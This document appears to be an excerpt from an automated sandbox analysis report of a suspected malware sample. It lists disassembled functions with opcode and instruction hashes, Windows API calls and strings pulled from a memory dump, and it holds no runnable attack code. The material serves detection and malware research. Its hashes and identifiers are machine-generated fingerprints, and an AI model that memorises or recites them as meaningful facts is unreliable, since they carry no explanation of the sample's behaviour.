                                                                                                                                                                                                                                                                                                • API String ID: 0-2129689772
                                                                                                                                                                                                                                                                                                • Opcode ID: f118f738c1350e73744dfe955e7318e677de72756cef5df48aea087d3d5b6029
                                                                                                                                                                                                                                                                                                • Instruction ID: 93f6273f9b5baa4d700427faed9b3f5d71219a1263c660ed4af69eddac32f899
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f118f738c1350e73744dfe955e7318e677de72756cef5df48aea087d3d5b6029
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7B116B3C016245BF728CA28DD9AAEABB79EB91304F0541BAE80D665C0D67D1FC5CE41
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8$n$n$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2129689772
                                                                                                                                                                                                                                                                                                • Opcode ID: 216cf784fcf9e46f0ab0b3fd3b03ffee15526c3e3d01e5c6d2a29d675902f7e4
                                                                                                                                                                                                                                                                                                • Instruction ID: ddd097c91ce82cc549c564f295aca5a5d11b1065950c6bd3b950c6c1f0e2623f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 216cf784fcf9e46f0ab0b3fd3b03ffee15526c3e3d01e5c6d2a29d675902f7e4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3B107B3D012245BF728CA28DD9AAEABB79EB91304F0541BAE80D661C0D77D1FC5CE51
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ExitProcess$ExitProcess$G<2@
                                                                                                                                                                                                                                                                                                • API String ID: 0-4201739117
                                                                                                                                                                                                                                                                                                • Opcode ID: 83f19afc67abe82571e38ff3db12f413b68646b430f82cd6c36d46b79f7540ab
                                                                                                                                                                                                                                                                                                • Instruction ID: c23cf397cf820b6e4d04b4d7928b2605fb7b39ed8a8d5c6d7e07ee262c8ce929
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83f19afc67abe82571e38ff3db12f413b68646b430f82cd6c36d46b79f7540ab
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBD16CB1D052699BDB24CB14CD94BEAB7B1FF88300F1481EAE909A7341DA386EC1CF55
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?,?,?,00462FCF,?), ref: 00463797
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 1705453755-3404278061
                                                                                                                                                                                                                                                                                                • Opcode ID: caa803cb6983296de5ee153f39e565eadd17667fad978c7f1401b26cac8d0a89
                                                                                                                                                                                                                                                                                                • Instruction ID: 3d361454ac5cdfa27015c84eaa1fed5b08bb663ce5d8b65a2c27fb38a1a831b9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: caa803cb6983296de5ee153f39e565eadd17667fad978c7f1401b26cac8d0a89
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811C5B69087019FC354DF69D98599BB7E4BF9C700F008A2EF4AE83250E731A548CF96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000003), ref: 0046300E
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0046301E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004631F0: FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$FileFirst$Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2810966245-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ac525a0fc5c95755cc08b111d521eb121ac2ef7f5b05646f188b6f13116b70e9
                                                                                                                                                                                                                                                                                                • Instruction ID: 9b1d8f8ee81afef67cdd5002a011b417e39822a31e6c33f357b0cfbac9d9b473
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac525a0fc5c95755cc08b111d521eb121ac2ef7f5b05646f188b6f13116b70e9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A38161711083819FC314DF14D988AABBBE8FFD9715F000A2EF59A83291DB749948CB67
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(?,00090064,00000000,00000000,?), ref: 00460093
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004600C0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 9847766-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                                • Instruction ID: b288529985f008a1a54ef72dbef53761962e394cc992aae83e13a0fae47ca317
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40F09CB5254B01AFD324CF55D841F53B7F9AB88B04F104A1DB68A87680D775F814CB55
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 0-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: b6e6f1d30904bbd89972e7c5541cf27078fea097c689c36a5cb6ef6dd1844168
                                                                                                                                                                                                                                                                                                • Instruction ID: b08322f707590d6679d8a3345288254223faeb83914a9e5506ea8f8450595ff3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6e6f1d30904bbd89972e7c5541cf27078fea097c689c36a5cb6ef6dd1844168
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61D27C716083459FD720DF24C880AABB7E5BF88705F14491EF989A7312DB34ED49CB9A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: KI94$M2PN
                                                                                                                                                                                                                                                                                                • API String ID: 0-2130967697
                                                                                                                                                                                                                                                                                                • Opcode ID: f00ddf2e6814fb0bafb74f8880a32f88e363ea16a4c898691e4a73b4cb37064c
                                                                                                                                                                                                                                                                                                • Instruction ID: 055610ecb8a69108d46e9ee1e057cb88f7b00d00f8ad207b40a4f8ebf115bd09
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f00ddf2e6814fb0bafb74f8880a32f88e363ea16a4c898691e4a73b4cb37064c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 586118B3D116145AF76CCA25DC9AAEBBB78EB85304F1081BBE00E56584DA7C5BC1CE41
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00474063
                                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00474074
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 41a9c3f869f20d536b5df22bbdb68c6f72c4f4a03b7167ff54cc11ecf120ab97
                                                                                                                                                                                                                                                                                                • Instruction ID: 0e5b393c9cfaccf242b34e640deb84f37198d475fe7bd5f1c49fe5a9f1fc366a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41a9c3f869f20d536b5df22bbdb68c6f72c4f4a03b7167ff54cc11ecf120ab97
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDF05E716002405BD7209FA5D848FA3779C9F85350F04C12EE65D873A1DB79E881CB99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 00420B4C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00420970: GetWindowRect.USER32(?,?), ref: 004209E6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: IconicRectWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3467660236-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6369986c62335c2f169f127993e99def2b7867e344ea96c29496c685a54ad688
                                                                                                                                                                                                                                                                                                • Instruction ID: f9d6239d05f36fe70fa0ff212e7df7f15f460ae1a1a005da7839878c6ec85a4b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6369986c62335c2f169f127993e99def2b7867e344ea96c29496c685a54ad688
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58E012723002348BD7319B65A444B9736E87B04788F8445EFA045C71B2D768E884C65C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\AutoDefragmention
                                                                                                                                                                                                                                                                                                • API String ID: 0-3564132280
                                                                                                                                                                                                                                                                                                • Opcode ID: dc3eb1a8291cfcc44befdd0b81a2d3cc0d6bc2a24e272f937c8f8eb1dffa6e4f
                                                                                                                                                                                                                                                                                                • Instruction ID: e958d21163334a27c47b0fc85bbaacef7bda82fad0e0f943e856080444f81741
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc3eb1a8291cfcc44befdd0b81a2d3cc0d6bc2a24e272f937c8f8eb1dffa6e4f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9691AEB1D045689AEB208B16CC847FAB775FF84310F1081FAD44DA7684EB785EC2CB5A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ZS
                                                                                                                                                                                                                                                                                                • API String ID: 0-2462379649
                                                                                                                                                                                                                                                                                                • Opcode ID: c9fca04b9b31143a71d11b10c0a7b839e3dd0717628822feacdf38de00b63aa6
                                                                                                                                                                                                                                                                                                • Instruction ID: f21c68479b3c5eaebc1f5f3279f8d0faad101d72c6b89a0a1b7083a0ace80ae7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9fca04b9b31143a71d11b10c0a7b839e3dd0717628822feacdf38de00b63aa6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C49104B2D055549BE728CB28CD89AEEBBB5EB89300F1481FFD40D67294D6785BC2CE41
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: LIIM
                                                                                                                                                                                                                                                                                                • API String ID: 0-2786805687
                                                                                                                                                                                                                                                                                                • Opcode ID: 0d070309e750cc16137fbcd4093448cd008a69c095d032d88c4fcb2cb504cc60
                                                                                                                                                                                                                                                                                                • Instruction ID: b690eebd353d2b85d82ae278129cacf35f28f669fdaef5e0157aee0fe20bd044
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d070309e750cc16137fbcd4093448cd008a69c095d032d88c4fcb2cb504cc60
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2391FFB5D146288AEB248B25DC847EB7735FF94310F1081FAE90DA7680E6795EC1CF26
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: M2PN
                                                                                                                                                                                                                                                                                                • API String ID: 0-1141530561
                                                                                                                                                                                                                                                                                                • Opcode ID: 163e1b2de707743fd5abd76dcefe4b986878c171430d14b46aaf6ac205012e71
                                                                                                                                                                                                                                                                                                • Instruction ID: b45ff77288e52d8fceb6442b72d5a5c11cff704adc7a61e63b92c1ca90ae0501
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 163e1b2de707743fd5abd76dcefe4b986878c171430d14b46aaf6ac205012e71
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A77138B3D116145AF76CCA25DC9AAEBBB78EB85304F1081BBE40E56580DA7C5BC1CE42
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: M2PN
                                                                                                                                                                                                                                                                                                • API String ID: 0-1141530561
                                                                                                                                                                                                                                                                                                • Opcode ID: bce53acc8339f026b01eb678d4e04c81f62b6b16d0eeaff7d47bfef90031c058
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b48fcab1f62f79797c961b25b48a75d2e1cd7c856f0701d3c915d2211f122b7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce53acc8339f026b01eb678d4e04c81f62b6b16d0eeaff7d47bfef90031c058
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F5116F3D012145AF75CCA14ED9AAEBBB78EB81314F1181BFE40EA5580DA7C5BC18E42
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ZS
                                                                                                                                                                                                                                                                                                • API String ID: 0-2462379649
                                                                                                                                                                                                                                                                                                • Opcode ID: f83dbaa3103210abbac085dce078393b74cbf9aa4bc9ad77f02cb7f14c9a23f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 79fb0355c5ed6b7355140cc2999def6dac6f408cb27f933924ab1563575a7ad0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f83dbaa3103210abbac085dce078393b74cbf9aa4bc9ad77f02cb7f14c9a23f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B5158F2D046545FE728CF28CD89AEEBB75EB99300F0481BFD40967694D6345B82CE01
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: cebec52c35d6d5a577127b37ee6518f550ca64958a00bab29b82289b9b11b50d
                                                                                                                                                                                                                                                                                                • Instruction ID: 6ff4827c734279f7e0de841156aecca73684415df30a65aab8c3daa831c00a85
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cebec52c35d6d5a577127b37ee6518f550ca64958a00bab29b82289b9b11b50d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20D1F8B2D082689AF7248A24DC44BEA7A75EB51310F0480FED44D57381DB7D5FC58FA6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • Opcode ID: 847c39c4f5666a72078e5b5598ea172d7dc977548d66f00abf79ae3014da07b0
                                                                                                                                                                                                                                                                                                • Instruction ID: 1d72f761c314e8721d5fc3daab525d3c272e2b9e29e56d20a39f15bc758c592e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 847c39c4f5666a72078e5b5598ea172d7dc977548d66f00abf79ae3014da07b0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35B1F6B1E082588AF7208A24DC48BEA7A75EF51304F1480FAD44D57382DA7E4FC98F66
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • Opcode ID: a57a128d1c16c12dcf4902804604208ecf22197fe885c780f8585ef138a26dff
                                                                                                                                                                                                                                                                                                • Instruction ID: 5f65285439b790b28c0d3b905ad07066762363c037cdec378342d8cce10f23cf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a57a128d1c16c12dcf4902804604208ecf22197fe885c780f8585ef138a26dff
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37B129316106099FD725CF28C48AB697FA0FF45364F298A58E89ACF2E1C375E991CB40
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • Opcode ID: 6156ee7c5859b3a1fcc43b2bfc7c0dd90522ffcbcea94545f825d9af007e4808
                                                                                                                                                                                                                                                                                                • Instruction ID: 6352d4130b6d38eda3f0917f26ea75489461ad1f8f451fda06db58098b015cac
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6156ee7c5859b3a1fcc43b2bfc7c0dd90522ffcbcea94545f825d9af007e4808
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5A10BB1E081588AF7248625DC48BEA7AB5EF51314F0480FED44C57382DA7D9FC98F66
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 411b77f1b17c79f053f6b327d9239c780f28367bd5560390947adfcd919ec4d5
                                                                                                                                                                                                                                                                                                • Instruction ID: a4e126031ac1d6303b47f947723bb3408289ab635862262de87fc69cd77de02e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 411b77f1b17c79f053f6b327d9239c780f28367bd5560390947adfcd919ec4d5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A491ECB2D002689FE7648B24DC85AEBBB74FB41314F1401FAD80DA7740E6789FC58E92
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2aaddafb20e5d728f4c7f58d37d0c4014a2491640944e86e7fe1add1687fe87b
                                                                                                                                                                                                                                                                                                • Instruction ID: 2d71716e8869df0f8adcb8ee14ead6314ef63eb97e38fecedd8178ce09fa27da
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2aaddafb20e5d728f4c7f58d37d0c4014a2491640944e86e7fe1add1687fe87b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA8107B3C012255BF728CB28DD9AAEABB79EB54304F0541BEE80D562C0D6796FC5CE41
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7d6ebca054e2f7689b85a4b771460ec9d32b8fbed782caf1c0a8fd484408adaf
                                                                                                                                                                                                                                                                                                • Instruction ID: 51035fdd40ba6af130e1cf43e43ed3c5e8d361631574942da8f568cd0f70edfa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d6ebca054e2f7689b85a4b771460ec9d32b8fbed782caf1c0a8fd484408adaf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F8118B3C012255BF728CA28CD9AAEABB79EB50304F0541BEE80D662C0D67D1FC5CE51
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d448fed136f6b013e5f0e5fe5ac6345940a68bad63eab45d570404b4bc144211
                                                                                                                                                                                                                                                                                                • Instruction ID: 0f8d8f1531549f543e787c892f2a16359ab3b996e260e3aad9816a7d043ea16d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d448fed136f6b013e5f0e5fe5ac6345940a68bad63eab45d570404b4bc144211
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B761F1B2C002659FE728CA14DD89AEEBBB8EB58304F0581FAD80D57280D7796FC1CE51
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b541515be619cc57e1ced3703a918bdf1bf3678252640863069d6bf7e10e918b
                                                                                                                                                                                                                                                                                                • Instruction ID: eaf653ec5e9d4917ec873c1fe015d9bd860e2ad1a1044f3bdc7716f885bac4d3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b541515be619cc57e1ced3703a918bdf1bf3678252640863069d6bf7e10e918b
